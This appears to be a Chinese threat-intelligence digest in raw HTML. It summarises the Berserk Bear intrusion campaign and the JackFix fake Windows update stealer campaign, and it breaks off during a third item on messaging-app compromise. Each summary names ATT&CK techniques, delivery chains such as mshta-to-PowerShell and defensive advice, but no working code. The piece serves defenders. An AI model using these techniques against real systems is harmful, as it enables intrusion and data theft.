data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j8nv91q33"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 10 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">综合运用鱼叉式邮件、水坑网站等手段达成初始入侵，实现长期隐蔽窃取情报</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 14px;">安全账户管理器（T1003.002）、NTDS（T1003.003）、LSA 机密（T1003.004）、从本地系统获取数据（T1005）、查询注册表（T1012）、系统网络配置发现（T1016）、远程系统发现（T1018）、远程桌面协议（T1021.001）、系统所有者 / 用户发现（T1033）、伪装账户名称（T1036.010）、计划任务（T1053.005）、命令与脚本解释器（T1059）、PowerShell（T1059.001）、Windows 命令 Shell（T1059.003）、Python（T1059.006）、域组（T1069.002）、清除 Windows 事件日志（T1070.001）、文件删除（T1070.004）、文件传输协议（T1071.002）、本地数据暂存（T1074.001）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j8nug10ts" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/dark-web-profile-berserk-bear/" target="_blank">https://www.hendryadrian.com/dark-web-profile-berserk-bear/</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1" data-pm-slice="0 0 []">活跃多年的 Berserk Bear 组织，长期</span><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1">以</span><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1" data-pm-slice="0 0 []">隐蔽</span><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1">窃取</span><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1" data-pm-slice="0 0 []">情报为目标，通过鱼叉式邮件附件及链接、水坑网站攻陷、供应链软件植入木马等方式实现初始入侵，还利用公开暴露的应用漏洞与路由器漏洞（如 CVE-2018-0171）远程渗透，部署植入程序维持持续访问。进入目标网络后，攻击者借助合法管理工具渗透网络设备，通过注册表修改、定时任务添加等实现持久化控制，收集各类凭证并利用 RDP、PsExec 等技术横向移动，搭建 C2 通信基础设施，利用多款公共服务漏洞扩大攻击面。他们通过数据压缩、隐藏文件、清理日志等手段隐蔽导出数据并远程操控，呈现长期潜伏特点。该攻击可能导致关键基础设施控制权受损、敏感信息泄露，威胁相关行业稳定运行。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8j8nug1wkv" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigdjvi20or" style="font-size: 14px;" data-mpa-action-id="mdigdjvs190d" data-pm-slice="0 0 []">及时修补漏洞，强化多因素认证与供应链安全，部署 EDR 解决方案监控异常，定期审查日志并完善应急与备份措施。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigfqighko"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8ma0u31cup" style="font-size: 32px;" data-mpa-action-id="md8ma0v2rky" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid="" data-mpa-action-id="mfag8t7o1pcm" data-pm-slice="0 0 []"><span mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">利用虚假的 Windows 更新投递多种窃取程序实现数据窃取及系统控制</span></span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">伪装（T1036）、用户执行（T1204）、脚本执行（T1059）、恶意软件部署（T1204.002）、数据窃取（T1081）、远程控制（T1219）、防御逃避（T1562）、权限提升（T1068）</span></span></p></li><li><p><span mpa-font-style="md8jbwp71xl3" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/jackfix-uses-fake-windows-update-pop-ups-on-adult-sites-to-deliver-multiple-stealers/" target="_blank">https://www.hendryadrian.com/jackfix-uses-fake-windows-update-pop-ups-on-adult-sites-to-deliver-multiple-stealers/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdigfqi21vxd" style="font-size: 14px;">该次网络攻击行动名为 JackFix，通过伪装成成人网站的页面植入全屏 HTML 和 JavaScript 弹窗，模拟 Windows 紧急更新界面迷惑用户。用户点击提示后，系统调用 mshta.exe 启动混淆 JavaScript 脚本，进而触发 PowerShell 命令执行，注入 Rhadamanthys、Vidar 等远程访问木马及数据窃取工具。攻击者还采用代码混淆、权限提升、隐写技术隐藏恶意代码，规避传统防护检测。此次攻击利用用户对系统更新的信任，兼具高成功率与隐蔽性，可能导致敏感信息泄露、系统被控制，引发财务损失与隐私风险，严重威胁终端用户安全。</span></p><p style="margin-top: 16px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="" style=""><span textstyle="" style="font-weight: bold;">防护建议：</span></span></span></p><p style="margin-top: 0px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="">用户警惕不明来源更新提示，安装并更新安全防护软件，过滤网页内容；定期更新系统补丁，监控 PowerShell 执行行为；验证高风险网站安全性，避免在非信任环境处理敏感信息。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdighks2kof"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9n1h17ag" style="font-size: 32px;" data-mpa-action-id="md8m9n2ku94" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">借伪造应用、零点击漏洞破加密防线，入侵加密消息应用，窃敏感信息并扩大攻击圈</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jdygzf90"><span leaf="">攻击方式关键词：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: justify;"><span 